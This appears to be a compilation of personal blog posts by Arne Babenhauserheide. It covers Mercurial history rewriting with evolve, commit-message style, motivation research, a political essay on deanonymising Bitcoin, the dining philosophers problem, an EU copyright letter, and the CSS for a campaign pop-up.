|  date:        Sat Jan 12 00:18:18 2013 +0100
|  summary:     apply people to wishes, places and scenes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |
Wishes:
- The Solek wants emotionally intense situations | specter, Lost
- The Judicator wants Action - portals


Places: 
- The village - lost, vanish, portals
- The researchers cave


Scenes:
- Lost appears | Lost
- People vanish | Specter
- Portals during dreamtime


People:
- The Lost
- The Specter

As you can see, the specter only applies to the wishes, and we miss a person for the action.

Let’s fix that.

cd testmy
sed -i "s/- The Specter/- The Specter\n- Wild Memories/" plan.txt
sed -i "s/- Portals during dreamtime/- Portals during dreamtime\n- Unconnected Memories/" plan.txt
hg ci -m "Added wild memories to fullfill the wish for action"
echo
hg log -G -r 19:
cd ..

@  changeset:   21:5393327d2d3f
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
o  changeset:   20:c00aa6f24c3f
|  user:        my
|  date:        Sat Jan 12 00:18:18 2013 +0100
|  summary:     apply people to wishes, places and scenes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

Now split the big change into applying people first to wishes, then to places and scenes.

cd testmy
# go back to the big change
hg up -r -2
# uncommit it
hg uncommit --all
# Now rework it into two commits
sed -i "s/- Lost appears | Lost/- Lost appears/" plan.txt
sed -i "s/- People vanish | Specter/- People vanish/" plan.txt
hg amend -m "Apply people to wishes"
sed -i "s/- Lost appears/- Lost appears | Lost/" plan.txt
sed -i "s/- People vanish/- People vanish | Specter/" plan.txt
hg commit -m "Apply people to scenes"
# let’s mark this for later use
hg book splitchanges
# and evolve to get rid of the obsoletes
echo
hg evolve --any
hg log -G -r 19:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
new changeset is empty
(use "hg kill ." to remove it)
1 new unstable changesets

move:[21] Added wild memories to fullfill the wish for action
atop:[24] Apply people to wishes
merging plan.txt
@  changeset:   26:ab48ecaceb01
|  tag:         tip
|  parent:      24:909bb640d4fc
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
| o  changeset:   25:76083662b263
|/   bookmark:    splitchanges
|    user:        my
|    date:        Sat Jan 12 00:18:23 2013 +0100
|    summary:     Apply people to scenes
|
o  changeset:   24:909bb640d4fc
|  parent:      19:8bf8d55739fa
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to wishes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

You can see the additional commit sticking out. We want to keep the history easy to follow, so we just graft the last change atop the split changes.

note: We seem to have the workdir on the new changeset instead of on the one we did before the evolve. I assume that’s a bug to fix.

cd testmy
hg up splitchanges
hg graft -O tip
hg log -G -r 19:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
grafting revision 26
merging plan.txt
@  changeset:   27:4d3a40c254b4
|  bookmark:    splitchanges
|  tag:         tip
|  parent:      25:76083662b263
|  user:        my
|  date:        Sat Jan 12 00:18:20 2013 +0100
|  summary:     Added wild memories to fullfill the wish for action
|
o  changeset:   25:76083662b263
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to scenes
|
o  changeset:   24:909bb640d4fc
|  parent:      19:8bf8d55739fa
|  user:        my
|  date:        Sat Jan 12 00:18:23 2013 +0100
|  summary:     Apply people to wishes
|
o    changeset:   19:8bf8d55739fa
|\   parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |

note: We use graft here, because using a second amend would just change the changeset in between but not add another change. If there had been more changes after the single followup commit, we would simply have called evolve to fix them, because graft -O left an obsolete marker on the grafted changeset, so evolve would have seen how to change all its children.

That’s it. All that’s left is finishing plan.txt, but I’ll rather do that outside this guide :)

3 Conclusion

Evolve does a pretty good job at making it convenient and safe to rework history. If you’re an early adopter, I can advise testing it yourself. Otherwise, it might be better to wait until more early adopters tested it and polished its rough edges.

note: hg amend was subsumed into hg commit --amend, so the dedicated command will likely disappear.

PS: In case you’re interested: The roleplaying session worked out wonderfully and a good deal of our planning actually survived the contact with the players - enough that we could wing the rest with short coordination meetings in which we two game masters enthusiastically told each other what happened in the respective group, planned the next steps and enjoyed the evil gamemasters giggle ☺.

note: This guide was created by Arne Babenhauserheide with emacs org-mode and turned to html via M-x org-export-as-html - including results of the evaluation of the code snippets.

Date: 2013-01-12T00:18+0100

Author: Arne Babenhauserheide

Org version 7.9.2 with Emacs version 24

Validate XHTML 1.0
Attachment                  Size
hg-evolve-2013-01-12.pdf    254.54 KB
hg-evolve-2013-01-12.org    13.19 KB

Track your scientific scripts with Mercurial

If you want to publish your scientific scripts, as Nick Barnes advises in Nature, you can very easily do so with Mercurial.

All my stuff (not just code), excepting only huge datasets, is in a Mercurial source repository.1

Whenever I change something and it does anything new, I commit the files with a simple commit (even if it’s only “it compiles!”).

With that I can always check “which were the last things I did” (look into the log) or “when did I change this line, and why?” (annotate the file). Also I can easily share my scripts folder with others and Mercurial can merge my work and theirs, so if they fix a line and I fix another line, both fixes get integrated without having to manually copy-paste them around.
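In practice that boils down to a handful of commands (a sketch; analysis.py is just a placeholder file name):

hg log -l 5                    # the last few things I did
hg annotate -u -d analysis.py  # who changed which line, and when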

For all that it doesn’t need much additional expertise: The basics can be learned in just 15 minutes — and you’ll likely never need more than these for your work.2

Update 2013: Nowadays I include the revision of scripts I use in the name of their output files or folders, so I always know which version of my scripts I used to create some result.
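A minimal sketch of that habit, assuming a POSIX shell and a placeholder script name:

REV=$(hg id -i)                        # short hash of the working directory
python analysis.py > results-$REV.csv  # the result file records the script version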


  1. Mercurial is free software for versiontracking: http://mercurial-scm.org 

  2. You can use Mercurial in three main ways:

concise commit messages

Written in the discussion about a pull request for Freenet.

When I look up a commit, I’m not searching for prose. I’m searching for short snippets of information I need. If the messages are long-winded explanations, I am unlikely to even read them.

To understand this, please imagine coming back home, getting off the bike and taking 15 minutes to look at the most recent pull-request. You know that you’ll need to start making dinner at 19:00, so there is no time to waste.

With long winded commit messages that plays out like this:

You look into the pull-request and the explanations are longer than the code changes. You can either read half the explanations or just look at the code. So you try to understand what the code does and what it intends to do from the code alone. After 15 minutes you post a partial review and start cooking. Next slot for code review is tomorrow evening, or maybe next friday. The pull-request lies open for several weeks while more changes pile up.

Contrast that with short commit messages:

You look into the pull-request. The commit message gives you the intention of the change (“sounds good”), maybe with a short note on non-obvious side-effects of the implementation, and you skim the code to see whether it realizes the intention. If it does and you don’t see problems which the writer might have overlooked: Great, code review finished. You write the review and go make dinner. The pull-request is merged the same week.

That’s why I’d suggest just writing short messages and putting detailed explanations into a blog, if you like writing those explanations. That’s what you have a blog for, and you can search it later if you need these notes. If they are essential to understanding the effects of later changes, you might want to document them in a text file like HACKING or docs/devnotes.txt.

The Linux kernel has nice examples of concise commit messages:

Note that the merge commit already almost looks like an entry into a NEWS file using the Perl Changes Format. (If NEWS files cause you merging pain, consider setting a union merge rule.)
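Such a rule could look like this in your .hgrc (a sketch; adjust the pattern to wherever your NEWS file lives):

[merge-patterns]
NEWS = internal:union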

workflow concept: automatic trusted group of committers

Goal

A workflow where the repository gets updated only from repositories whose heads got signed by at least a certain percentage or a certain number of trusted committers.

Requirements

Mercurial, two hooks for checking and three special files in the repo.

The hooks do all the work - apart from them, the repo is just a normal Mercurial repository. After cloning it, you only need to setup the hooks to activate the workflow.

Extensions: gpg

Hooks: prechangegroup and pretxnchangegroup

Files: .hgtrustedkeys , .hgbackuprepos , .hgtrustminimum

concept

Hooks

  • prechangegroup: Copy the local versions of the files for access in the pretxnchangegroup hook (might be unnecessary by letting the pretxnchangegroup hook use the rollback-info).

  • pretxnchangegroup:

    • per head: check if the tipmost non-signature changeset has been GnuPG signed by enough trusted keys.
    • If not all heads have enough signatures, rollback, discard the current default repo and replace it with the backup repo which has the most changesets we lack. Continue discarding bad repos until you find one with enough signatures.

Special Files

.hgtrustedkeys contains a list of public GnuPG keys.

.hgbackuprepos contains a list of (pull) links to backup repositories.

.hgtrustminimum contains the percentage or number of keys from which a signature is needed for a head to be accepted.
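A sketch of how the hooks could be wired up in the repository's hgrc (the script names are hypothetical; they would read the three special files and use hg sigcheck from the gpg extension to verify the signatures on each head):

[hooks]
prechangegroup.trustbackup = /path/to/backup-local-heads.sh
pretxnchangegroup.trustcheck = /path/to/check-head-signatures.sh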

Notes

With this workflow you can even do automatic updates from the repository. It should be ideal for release repositories of distributed projects.

If you want to work on the project, a very worthwhile goal might be implementing it in infocalypse: anonymous code collaboration via Freenet and Mercurial, built to survive the informational apocalypse (and any kind of censorship).

Politics and Free Licensing

Being unpolitical
means being political
without realizing it.
— Arne Babenhauserheide

Here you’ll find texts about politics and free licensing. Some of my creative works on the topic can be found under Songs, though.

More technical articles on using free software is filed under Free Software.

How to make a million dollars in pay-what-you-want — thoughts on the Humble Indie Bundle

Some thoughts1 on how the Humble Indie Bundle managed to get more than 1.25 million dollars2 in one and a half weeks — more than one quarter of that from GNU/Linux users.

Let me repeat that: One quarter of the money came from GNU/Linux users. And the average GNU/Linux user paid almost twice as much for the game as the average Windows user.

How they did it? If I could give you a simple recipe which is certain to work for everyone, I might just hire up at Blizzard.

But I think a big part is that (from my view — and obviously from the view of others, too) they did everything right. And I mean everything:

  • The games are great.

  • The message the name “humble indie bundle” conveys is great.

  • You could pay whatever you want. From 1 cent to a million. The highest single contribution was $3,333.33, with an average contribution of $9.17 over all platforms and $14.52 from the average GNU/Linux user3.

  • You could directly see how much money they made on the front page, along with an info about the average contribution, split by platform.

  • Normally each game would have cost $20, so the average payment for all games also was a significant price drop.

  • They donated about one third to charitable organizations. The buyers could decide how much should go to whom.

  • Payment was easy via Paypal and others.

  • All games work on GNU/Linux, MacOSX and Windows out of the box.

  • Each game already had a community. The bundle bundled their impact so it went viral on Twitter, identi.ca, facebook, etc.

  • They have clear and simple download links. Should I ever lose the games locally, I can just redownload them. If need be with wget.

  • They use no DRM or similar, so I can show the games to friends and won’t be troubled by use restrictions.

  • And on the last day they announced that for 4 of the 6 games the code would become free software if they cracked the 1 million dollar boundary. It took just over 16 more hours to raise an additional $200,000. And they followed up on their pledge, with 2 games already freed and 2 more to follow as soon as the code is cleaned up.

To wrap it up: They did everything right, so almost everybody who saw it was delighted and there was nothing to break the viral network effects.

And I think that getting any one of these points wrong would have killed a major part of the network effect, because the naysayers are far stronger in the networking game than the fans.

Any foul trick would have cost them many fans, because someone would have been bound to find out and go viral with it.


  1. Originally written as comment to Why Games don't get ported to Linux...A game dev speaks

  2. Stats directly from the Website of the Humble Indie Bundle

  3. More exactly:

    • Total revenue: $1,273,593
    • Number of contributions: 138,812
    • Average contribution: $9.17
      • Windows: $8.05
      • MacOSX: $10.18
      • GNU/Linux: $14.52

Motivation and Reward

Debunking the myth that you can increase the performance of creative workers with carrot and stick.

Executive Summary

For creative tasks, the quality of performance strongly correlates with intrinsic motivation: being interested in the task itself.

This article will only talk about that.

The main factors which are commonly associated with intrinsic motivation are:

  • Positive verbal feedback which increases intrinsic motivation.
  • Payment independent of performance which actually has no effect.
  • Payment dependent on performance which reduces the motivation on the long term.
  • Negative verbal feedback which directly reduces intrinsic motivation.
  • Threatening someone with punishment which strongly reduces intrinsic motivation.

To make it short: Anything which diverts the focus from the task at hand towards some external matter (either positive or negative) reduces the intrinsic motivation and that in turn reduces work performance.

If you want to help people perform well, make sure that they don’t have to worry about other stuff besides their work and give them positive verbal feedback about the work they do.

Background

Since this claim goes pretty much against the standard ideology of market-trusting economists, I want to back it with solid scientific background.

The easiest way to do that is to go to Google Scholar and search for research on motivation and rewards. That search turns up a meta-analysis of experiments on the effects of extrinsic rewards on intrinsic motivation:

A meta-analytic review of experiments examining the effects of extrinsic rewards on intrinsic motivation.
— E.L. Deci, R Koestner, R.M. Ryan - Psychological bulletin, 1999 - psycnet.apa.org

This paper is cited by 2324 other papers Google knows about, which is an indicator of its acceptance by the psychological community (unless those should turn out to be 2324 rebuttals) - an indicator which even those who are not really versed in that community (for example me) can understand.

I dug into the paper to find solid scientific research on the effects of payment on motivation. And that led me to this older paper from Edward L. Deci:

The Effects of Contingent and Noncontingent Rewards and Controls on Intrinsic Motivation
— Edward L. Deci, University of Rochester, Organizational Behavior and Human Performance, 1972

Their research question was whether money paid unconditionally weakens intrinsic motivation in the same way as money paid for good performance:

» Two recent papers (Deci, 1971, 1972) have presented evidence that when money was paid to subjects for performing intrinsically motivated activities, and when that money was made contingent on their performance, they were less intrinsically motivated after the experience with money than were subjects who performed the same activity for no pay.«

This is about intrinsic motivation: The kind of motivation which fuels artists and other creative people and allows them to do great deeds.

It’s the kind of motivation, a company should try to inspire in every employee who does anything remotely creative or complex.

What reduces intrinsic motivation

There was previous research which showed a reduction of intrinsic motivation due to payment. To make their research solid, the first thing E.L. Deci and his group did was a replication to ensure that the basic theory is correct.

In another experiment using the one-session paradigm, Deci and Cascio (1972) showed that negative feedback resulting from bad performance on an intrinsically motivated activity caused a decrease in intrinsic motivation.

In my words: Tell people that they do bad work and you reduce their motivation - not surprisingly.

“Your performance sucks” → intrinsic motivation decreases.

Further, Deci and Cascio (1972) reported that when subjects were threatened with punishment for poor performance, their intrinsic motivation also decreased.

Threaten people, and their motivation gets reduced, too.

“If you fail, you’re fired” → intrinsic motivation decreases.

[…]Deci (1972) replicated the finding that subjects who were paid one dollar per puzzle solved showed a decrease in intrinsic motivation.

Pay people for good performance and you reduce their motivation.

“For each housing loan you sell, you get 20€” → intrinsic motivation decreases.

This is the result which actually marks all the performance-based payment schemes which are so popular with the administration folks as utter nonsense - at least for creative and complex jobs.

For those jobs your employees enjoy doing, bonuses actually decrease performance in the long run. These are the kinds of jobs in which people can work overnight and concentrated for hours and lose track of time while they work on systems which are too complex for most people to even pretend to understand. The kind of jobs where some people get into the flow and do more work in an hour than other people do in a week. Jobs in science, in programming and actually in any other topic in which you do not just follow prescribed rules but actually solve problems.

The kind of jobs which is more and more common, because jobs with prescribed rules can just as well be done by machines.

And social jobs, the other kind of jobs for which you need people, because people doing social jobs work with people and anything involving people is a complex problem by definition. At least if you want really good results.

Or, seen from a different perspective: If two companies compete in a segment of the market and one has motivated people and the other doesn’t - and other factors are mostly equal - then the company with motivated people wins.

So you want motivated people. And in creative, complex or social jobs, you want them intrinsically motivated. You want them to do a good job for the sake of doing a good job.

Which means, you want to avoid

  • giving them negative feedback,
  • threatening them and
  • paying them based on their performance.

With that in mind, let us go on: How can we actually motivate people?

What enhances motivation

To answer that, let’s listen to research again:

On the other hand, Deci (1971, 1972) has reported that verbal reinforcements do not decrease intrinsic motivation; in fact, they appear to enhance it.

So, to increase motivation, tell people that they do good work.

„I like that plan! Go for it!“ → intrinsic motivation increases.

That’s all you can do. Tell them that they do good work. Encourage them.

But isn’t there a paradox? How can we actually employ people, if paying them money for good work decreases their motivation?

How to pay motivated people?

That’s the real question, the paper from Edward L. Deci tackled:

While extrinsic rewards such as money can certainly motivate behavior, they appear to be doing so at the expense of intrinsic motivation. […but…] when payments were not contingent upon performance, intrinsic motivation did not decrease.

So the answer is pretty simple: Just pay them money independent of how well they do.

„You get 3000€ a month. Flat. That’s enough to lead a good life.“1 → intrinsic motivation stays stable.

The real trick is to just give them money, independent of how well they do. If motivated people work for you, ensure that they do not have to worry about money. Do all you can to take money concerns off their mind.

And tell them what they do well.

At least that’s what you should do if you want to base your actions on research instead of on the broken intuition of people who get paid for their performance in convincing you of their ideology (and consequently often do so in blatant, uncreative ways).

If you do that already: That’s great! Likely it’s really cool to work with you.

Illustration

A very illustrative experiment on losing intrinsic interest due to external reward was done by Mark R. Lepper, David Greene and Richard E. Nisbett.2

They observed three groups of pre-school children. The first group was told that they would get a “certificate with a gold seal and ribbon” if they would draw something. The second group wasn’t told that they would get a reward, but got it after drawing, too. The third group did not get any reward and did not expect any.

Before the start of the experiment, their intrinsic interest in drawing was measured by observing how much time they spent drawing when they had the chance.

One to two weeks after the experiment, the intrinsic interest of the children was measured again by observing them through a one-way mirror.

In that subsequent measurement, the children who had been told that they would get the reward for drawing (and had gotten it) spent half as much time drawing as those who had not gotten any reward or those who had gotten an unexpected reward.

And even when the pictures which they had drawn during the initial test were compared, the pictures from the group which expected a reward were of significantly lower quality than the pictures from the two other groups: The difference between expected extrinsic reward and no reward was 2.18 vs. 2.69 on an independently judged quality scale from 1 (very poor) to 5 (very good).

So offering children a reward for drawing not only reduces their intrinsic interest in drawing, but also reduces the quality of the pictures they draw.

And this is perfectly in line with the results from the paper from Edward L. Deci on intrinsic motivation of adults.

Summary

To increase the motivation of people, DO

  • Pay them a good monthly income, so they don’t have to worry about money, and
  • Give them positive verbal feedback on the things they do well.

Update: A good fixed income and long-term contracts are a tool to allow people to work full-time without reducing their motivation. They avoid the harmful effect performance-based payment can have on performance while enabling people to work full-time on a project. An empirical study found that the source and intensity of motivation of free software developers does not differ significantly between people who work for hire and people who work without payment, so many companies employing free software developers seem to do it right (or only the companies who do it right can keep their free software programmers).3

And should you happen to be interested in helping a free software project with money, just employ some of the people hacking on the project - and give them a good, long-term contract with enough freedom of choice, so they don’t have to worry about money or about what they are allowed to do, but can instead focus on working to make the project succeed - like they did before you employed them, but now with more time at their disposal. And, as with anything else, give them positive feedback on the things they do well.

In the paper »Why Hackers Do What They Do: Understanding Motivation and Effort in Free/Open Source Software Projects« from 2005, Karim R. Lakhani and Robert G. Wolf showed empirically that the payment people get to work in free software projects has no detrimental effect on their intrinsic motivation. In their sample 40% of the developers were paid for their work on free software projects, and their intrinsic motivation was as high as the motivation of unpaid developers.

Key Takeaway:

If you want to help people perform well, make sure that they don’t have to worry about other stuff besides their work and give them positive verbal feedback about the work they do.


  1. Actually the ideal yearly income would be 60,000€, but only a few people earn that much. Which might be a societal problem in itself, one which limits the performance we could achieve as a society. If that’s something you want to tackle: Head into politics and change the world - or found a company and do it right from the start. There’s a lot which even a small group of motivated people can achieve. 

  2. Undermining children's intrinsic interest with extrinsic reward by Mark R. Lepper and David Greene from Stanford University and Richard E. Nisbett from the University of Michigan, Journal of Personality and Social Psychology, Vol 28(1), Oct 1973, 129-137. doi: 10.1037/h0035519 

  3. We find […], that enjoyment-based intrinsic motivation, namely how creative a person feels when working on the project, is the strongest and most pervasive driver. The source and intensity of motivation of free software developers does not differ significantly between people who work for hire and people who work without payment. From Why Hackers Do What They Do: Understanding Motivation and Effort in Free/Open Source Software Projects by Karim R. Lakhani* and Robert G Wolf** from the * MIT Sloan School of Management | The Boston Consulting Group and ** The Boston Consulting Group. 

3 steps to destroy Bitcoin for anonymous usage

Org (source)

PDF (print)

Bitcoin is often treated as a haven for black market buyers and people who want to avoid illegitimate laws. However, three simple steps would suffice to mostly obliterate Bitcoin for black market usage by ordinary users.

Breaking Bitcoin

Three steps to break Bitcoin for small scale anonymous usage:

  1. infrastructure: Make it possible for users to register their Bitcoin wallets with their real identity.
  2. law or terms of service: Make it illegal to accept money from unregistered users.
  3. program: Create a script which checks whether the transferred bitcoins were tainted by passing through wallets of unregistered users (a minimal sketch of such a script follows below). Tainted bitcoins lose value, because non-anonymous services won’t be able to accept tainted bitcoins anymore, so anonymous services become more expensive. Allow people to avoid being tainted by anonymous transactions by sending back the same value minus mining fees within a week.
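
To make step 3 more concrete, here is a minimal Python sketch of such a taint-tracking script (my own illustration: the Transaction record, the wallet names and the registered_wallets set are invented for the example; a real script would read them from the public block chain and the registration database):

    from collections import namedtuple

    # Hypothetical minimal transaction record: which wallets the coins
    # came from and which wallets they go to.
    Transaction = namedtuple("Transaction", ["inputs", "outputs"])

    def update_taint(transactions, registered_wallets):
        """Walk the public transaction history in order and mark every
        wallet that received coins touched by an unregistered wallet."""
        tainted = set()
        for tx in transactions:
            if any(w not in registered_wallets or w in tainted for w in tx.inputs):
                tainted.update(tx.outputs)
        return tainted

    # Example: wallet "C" is unregistered, so everything it passes on is tainted.
    history = [Transaction(inputs=["A"], outputs=["B"]),
               Transaction(inputs=["C"], outputs=["D"]),
               Transaction(inputs=["D"], outputs=["E"])]
    print(update_taint(history, registered_wallets={"A", "B", "D", "E"}))
    # -> {'D', 'E'}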

That’s it. It will not deanonymize all of Bitcoin, but it will deanonymize most users, and making any kind of sustainable profit from Bitcoin will require identity fraud - which carries such harsh penalties that most small scale black market sellers will not dare to go that far.

And enacting this does not even need a state. It can be pulled off by any large entity which accepts Bitcoin as payment, like Paypal or Microsoft.

It gets worse

And it gets worse: large scale Bitcoin owners and black market sellers will have an incentive to pressure their buyers into registration after their sale, because that will increase the effective value of their Bitcoins. Implement the method I outlined, and greed will drive the users themselves to make Bitcoin a hostile place for anonymous users.

People might run schemes to sell at a high price to anonymous users and then pressure them into registering, so the bitcoins become more valuable. Or sell them registration with false identities. Which they could even report later, after they transferred their bitcoins at high value to someone else, to disrupt a competitor’s business.

Happy Ending

Voilà, for ordinary users Bitcoin becomes a viable, happy do-good, decentralized currency with full public accountability which can reduce the trust requirement in the banking system and simplify tax enforcement, while people who can launder money today can still use that power in Bitcoin and even get a few new tools in their toolbox to increase their power relative to ordinary and/or law-abiding users.

The prince marries the princess, the king exercises his right of the first night and all live happily ever after.

Epilogue

I hope I could show that Bitcoin isn’t the haven for freedom and state-free happiness it is often touted to be. It can reduce the power of banks, because it reduces the trust we have to place in their actions - and I think that it will be used by banks themselves as a very efficient backend for reliable transactions - but the total accountability inherent in Bitcoin is hostile to any kind of free expression and independent life, because it allows others to judge you by your actions years later and as such creates pressure to self-censor how you use Bitcoin. In this it is inferior to cash.

And as I showed here, in the long term only large criminal organizations will be able to retain anonymous usage of Bitcoin, while all others will either be driven into buying the services of these organizations to stay anonymous (which makes them susceptible to blackmail: their bitcoins could lose most of their value at any point) or into registering their Bitcoin identity and giving up on anonymous usage of Bitcoin.

Attachment: 2015-01-28-Do-destroy-anonymous-bitcoin.pdf (68.65 KB)
Attachment: 2015-01-28-Do-destroy-anonymous-bitcoin.org (3.69 KB)

7,26€ through Flattr last month

Last month I earned 7,26€ through my Flattr account (Flattr is a voluntary payment service where people can make micropayments if they like something - after enjoying it). The flattrs came in through just 4 items:

Thank you very much for your flattrs, dear supporters1! Thanks to you I could pay most of my server cost this month via the money from flattr - and that’s great!2


  1. This month I was flattred by eileentso, esocom, Elleo and a user who wanted to stay anonymous. Thank you again! 

  2. And being able to pay the server might become much more important in the following months, as soon as my wife’s parental leave pay runs out and I need to finance the family from a (50%) PhD salary for a year… 

A simple solution to the dining philosophers problem

The problem

5 Philosophers do nothing but eat and think.

They have a table with 5 chairs, 5 plates and 5 forks.

Each of them eats with two forks.

Ensure that none of them starves.

The solution

First I teach them to always take the left fork first.

Then I smash one of their chairs.

Explanation

Since they can't repair the chair (they think, but they don't build), there are only 4 places left, so there is one leftover fork, which gets passed on once one of them has finished eating.
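
As a rough illustration (my own sketch, not part of the original puzzle statement), the two rules can be written down in a few lines of Python: a semaphore with four slots stands for the four remaining chairs, one lock per fork, and every philosopher grabs the left fork first.

    import threading, time, random

    forks = [threading.Lock() for _ in range(5)]
    chairs = threading.Semaphore(4)   # the smashed chair: only 4 may sit at once

    def philosopher(i):
        for _ in range(3):
            time.sleep(random.random())            # think
            with chairs:                           # sit down only if a chair is free
                left, right = forks[i], forks[(i + 1) % 5]
                with left:                         # always take the left fork first
                    with right:
                        time.sleep(random.random())    # eat
                # standing up releases both forks and the chair

    threads = [threading.Thread(target=philosopher, args=(i,)) for i in range(5)]
    for t in threads: t.start()
    for t in threads: t.join()
    print("All philosophers ate; none of them starved.")

With only four of them seated, the pigeonhole principle guarantees that at least one philosopher always gets both forks, so the group can never deadlock.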

Inspired by William Stallings' Operating Systems: "Use a servant who lets only 4 dine at the same time"

Naturally now they have to either change places or move chairs, so they might still need a servant :)

Please vote for amendments to the EU copyright directive

An open letter to the Members of the European Parliament on the vote about the EU copyright directive.

Dear Members of the European Parliament,

On September 12th you have the opportunity to vote on whether the Internet stays open to small companies and creative people, which the 2016 version of the copyright directive would have achieved, or whether it turns into a monopolistic censorship machine, which the version from May 2018 would bring about.

I am writing to you as a programmer, because the consequences of this directive cannot be judged from a purely legal perspective; this is especially true for Article 13. Just as a law cannot stop the tide, it cannot create an algorithm which blocks every copyright infringement at upload time while allowing all legal content. If really every copyright infringement has to be stopped, then many legal statements have to be blocked as well, and according to the directive this applies to every form of public communication. Yet that is exactly what the directive demands, because it reverses the burden of proof by requiring providers of communication platforms to prove to the rights holders that they are doing enough (and thereby violates fundamental principles of the rule of law, according to which the presumption of innocence applies in case of doubt). Platforms, large and small, therefore have to block everything first. And since no penalties are foreseen for wrongful blocking requests, it becomes very easy to suppress unwanted statements, even if only temporarily.

A Youtube news author (LeFloid) recently reported in an interview with the NDR[1] that the filters which already exist on youtube block his videos again and again for a few days, which means the video gets less than a tenth of the viewers it would otherwise have, because by then the topic has already passed. He copes with this by also offering his videos on other platforms. But with the wording of Article 13 in the version from May 2018, all platforms would have to filter uploads, and for liability reasons they would have to use the filters of large providers which can afford to invest tens of millions in the development of filtering technology (and which, as LeFloid's experience shows, still block permitted content in many cases). He then could no longer offer these videos anywhere in a timely manner.

Article 12, Article 11 and Article 3 are similarly problematic, but I cannot write you examples for them, because I have to get up at 5:00 tomorrow and go to work.

Instead I would therefore like to ask you to read the proposals from Greens/EFA and EFDD with an open mind and to follow your conscience, knowing that these are the proposals supported by people with expertise in programming.

Kind regards,

Dr. Arne Babenhauserheide

[1] https://www.youtube.com/watch?v=KE5AZDBygNQ

Censorship in the Streets — it’s idiocy everywhere

A man in the streets faces a knife.
Two policemen are there at once. They raise a sign:

“Illegal Scene! No one may watch this!”

The man gets robbed and stabbed and bleeds to death.
The police had to hold the sign.

Welcome to Europe, citizen. Censorship is beautiful.

→ Courtesy to Censilia, who wants censorship in the EU after it failed in Germany. You might also be interested in 11 more reasons why censorship is useless and harmful.

PS: This poem is free and permissively licensed: Please feel free to use it any way you like, as long as you provide a backlink.

Copyright directive modal window for your website

The European Copyright directive threatens online communication in Europe. On September 12th the European parliament takes the crucial vote which can still fix it. But the parliamentarians (MEPs) need to hear our voices.

If you care about the future of the Internet in the EU, please Call your MEPs!

And if you have a website and want to inform your visitors about this vote, copy the following and add it to your site:


    <!-- begin fsf-dbd-elem campaign element -->
    <!-- this campaign element was repurposed for the fight to fix the European Copyright directive, using freedom 1 of the four freedoms granted by the GPLv3 -->
            <link type="text/css" rel="stylesheet" href="https://static.fsf.org/nosvn/fonts/fa/css/font-awesome.min.css">
            <style>
#fsf-dbd-elem-container div {
    -webkit-box-sizing: border-box;
       -moz-box-sizing: border-box;
            box-sizing: border-box;
}

@media screen and (min-width: 700px) {

    #fsf-dbd-elem-outer-v-center {
        display: table;
        position: absolute;
        height: 100%;
        width: 100%;
    }
    #fsf-dbd-elem-inner-v-center {
        display: table-cell;
        vertical-align: middle;
    }

    #fsf-dbd-elem {
        width: 687px;
        margin-left: auto;
        margin-right: auto;
    }

    #fsf-dbd-elem-right-column {
        float: right;
        width: 280px;
        padding-left: 20px;
    }

    #fsf-dbd-elem-left-column {
        width: 100%;
        float: left;
        margin-right: -280px;
    }

    #fsf-dbd-elem-text {
        margin-right: 280px;
    }
}

@media screen and (max-width: 699px) {

    #fsf-dbd-elem {

        -ms-box-orient: horizontal;
        display: -webkit-box;
        display: -moz-box;
        display: -ms-flexbox;
        display: -moz-flex;
        display: -webkit-flex;
        display: flex;

        -webkit-flex-flow: row wrap;
        flex-flow: row wrap;
    }

    #fsf-dbd-elem {
        width: 80vw;
        margin-left: 10vw;
        margin-right: 10vw;
        margin-top: 40px;
        margin-bottom: 40px;
    }

    #fsf-dbd-elem-right-column {
        width: 100%;
        order: 1;
    }

    #fsf-dbd-elem-left-column {
        width: 100%;
        order: 2;
    }

    #fsf-dbd-elem-text {
        margin-top: 20px;
    }
}

@media screen and (max-width: 360px) {
    .long-button-text {
        font-size: 25px !important;
    }
}

#fsf-dbd-elem-container {
    position: fixed;
    z-index: 10000;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.8);

    font-weight: normal;
}

#fsf-dbd-elem a, a:active, a:focus {
    outline: none;
}

#fsf-dbd-elem {
    overflow: auto;
    zoom: 1;
    padding: 20px;
    border-style: solid;
    border-width: 5px;
    border-color: rgb(254, 203, 0);
    border-radius: 20px;
    box-shadow: 0px 0px 10px #111111;
    background: #ffffff url("https://www.defectivebydesign.org/sites/all/themes/dbd2/images/repeat-offenders-bg.png") top left repeat;
}

#fsf-dbd-elem-header {
    width: 100%;
}

#fsf-dbd-elem-header h2 {
    font-family: sans-serif,"Helvetica",Arial;
    font-weight: bold;
    font-size: 24px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
    padding-bottom: 20px;
    margin-top: 0px;
    margin-bottom: 0px;
    border: none;
}

#fsf-dbd-elem-close-button {
    float: right;
    height: 40px;
    margin-right: -20px;
    margin-top: -20px;
    padding: 11px;
    color: #888;
    cursor: pointer;
}

#fsf-dbd-elem-close-button:hover {
    color: #aaf;
}

#fsf-dbd-elem-right-column {
    text-align: center;
    -webkit-user-select: none;
       -moz-user-select: none;
        -ms-user-select: none;
            user-select: none;
}

#fsf-dbd-elem-buttons div {
    height:53.333px;
    line-height: 53.333px;
    margin-left:auto;
    margin-right:auto;
    display:block;
}

